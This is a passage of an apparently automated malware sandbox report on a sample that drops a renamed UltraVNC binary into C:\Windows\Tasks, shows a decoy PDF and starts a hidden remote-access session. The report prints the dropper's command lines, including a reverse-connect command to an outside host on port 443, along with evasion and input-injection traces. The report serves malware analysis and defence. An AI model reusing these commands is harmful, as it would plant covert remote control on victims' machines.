Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7E10 GetPrivateProfileIntA,27_2_00007FF6C2BD7E10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7D50 GetPrivateProfileIntA,27_2_00007FF6C2BD7D50
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7EB0 GetPrivateProfileIntA,27_2_00007FF6C2BD7EB0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,27_2_00007FF6C2BD7650
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\3889122.Khe9oLY

                            Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (98).png
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF6C2BB48B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,27_2_00007FF6C2BB48B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B85A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,23_2_00007FF6C2B85A60
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF6C2BE9BC0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6C2B89D00
Source: C:\Windows\Tasks\browser_sn.exe | Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,27_2_00007FF6C2B89D00
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 445
Source: C:\Windows\Tasks\browser_sn.exe | Window / User API: threadDelayed 1212
Source: C:\Windows\SysWOW64\timeout.exe | Window / User API: threadDelayed 1266
Source: C:\Windows\Tasks\browser_sn.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_23-22366
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Windows\Tasks\uqVb3.kkb9h
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe
Source: C:\Windows\Tasks\browser_sn.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_23-22851
Source: C:\Windows\Tasks\browser_sn.exe | API coverage: 3.5 %
Source: C:\Windows\Tasks\browser_sn.exe | API coverage: 1.2 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 6708 | Thread sleep count: 59 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6556 | Thread sleep count: 35 > 30
Source: C:\Windows\Tasks\browser_sn.exe TID: 6324 | Thread sleep time: -121200s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4628 | Thread sleep count: 69 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6808 | Thread sleep count: 1266 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6808 | Thread sleep time: -126600s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Tasks\browser_sn.exe | Last function: Thread delayed
Source: C:\Windows\Tasks\browser_sn.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6C2BAC210
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6C2C3A228
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6C2B85910
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,27_2_00007FF6C2BAC210
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,27_2_00007FF6C2C3A228
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,27_2_00007FF6C2B85910
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,27_2_00007FF6C2BA6DD1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B99260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,23_2_00007FF6C2B99260
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: browser_sn.exe, 00000024.00000002.1778177852.00000000011DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW:
Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: browser_sn.exe, 0000001B.00000002.1608916736.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778177852.00000000011DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: browser_sn.exe, 00000017.00000002.1678342590.000000000123E000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000022.00000002.3280182289.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: C:\Windows\Tasks\browser_sn.exe | API call chain: ExitProcess graph end node graph_23-22108
Source: C:\Windows\Tasks\browser_sn.exe | API call chain: ExitProcess graph end node
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information queried: ProcessInformation
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6C2C37220
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B926B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,23_2_00007FF6C2B926B0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF6C2BE9BC0
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6C2C37220
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C447E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF6C2C447E4
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FF6C2C37220
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2C447E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00007FF6C2C447E4
Source: C:\Windows\Tasks\browser_sn.exe | Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe 27_2_00007FF6C2BE9BC0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B89BD0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,23_2_00007FF6C2B89BD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF6C2B974C0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B84390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,23_2_00007FF6C2B84390
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B97B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,23_2_00007FF6C2B97B90
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
Source: Xv6Ya.d8LhT.0.dr | Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Program Manager
Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Shell_TrayWnd
Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Progman
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BE9EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,23_2_00007FF6C2BE9EF0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2C3DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_00007FF6C2C3DF80
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                            Stealing of Sensitive Information

Source: Yara match | File source: 34.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
